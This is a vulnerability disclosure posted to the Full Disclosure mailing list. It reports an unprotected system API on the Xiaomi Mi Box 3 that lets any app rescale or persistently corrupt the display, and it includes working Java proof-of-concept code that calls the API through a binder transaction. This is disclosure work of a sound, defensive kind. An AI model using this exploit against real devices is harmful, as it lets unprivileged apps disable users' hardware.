Vulnerability in MiBox3

["Bug Reporter" <helloworldxp () 126 com>]

HI,




I would like to report a security vulnerability in Xiaomi Mi Box (model: MIBOX3, build.id : MHC19). 

The vulnerability allows rescaling and corrupting the display without any privilege requirement, thus creating an 
opportunity for a non-privilege malicious app to disable the basic functionalities that the TV box is offering or can 
even be used for ransomeware purpose - e.g., each time a target streaming app is launched, the malicious app can 
corrupt the display. 





This vulnerability is due to the following:

Xiaomi introduces a (non-protected) custom API in the SystemControl system service “setPosition” which takes as 
arguments 4 integers. Once invoked with maliciously set parameters, the system display will be effected; e.g.,  (500, 
500, 1000,1000) for rescaling the display and (1000,1000,1000,1000) for corrupting the display. Note that the display 
corruption will be persistent across reboots, making it very difficult to be fixed without a hard reset.




We can exploit this API as follows:

Class ServiceManager = Class.forName("android.os.ServiceManager");

Method getService = ServiceManager.getMethod("getService", String.class);

mRemote = (IBinder) getService.invoke(null,"system_control");

Parcel localParcel1 = Parcel.obtain();

Parcel localParcel2 = Parcel.obtain();

localParcel1.writeInterfaceToken("droidlogic.ISystemControlService");

localParcel1.writeInt(500);

localParcel1.writeInt(500);

localParcel1.writeInt(1000);

localParcel1.writeInt(1000); 

mRemote.transact(16, localParcel1, localParcel2, 0);  // 16 corresponds to the API setPosition

localParcel2.recycle();

localParcel1.recycle();

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/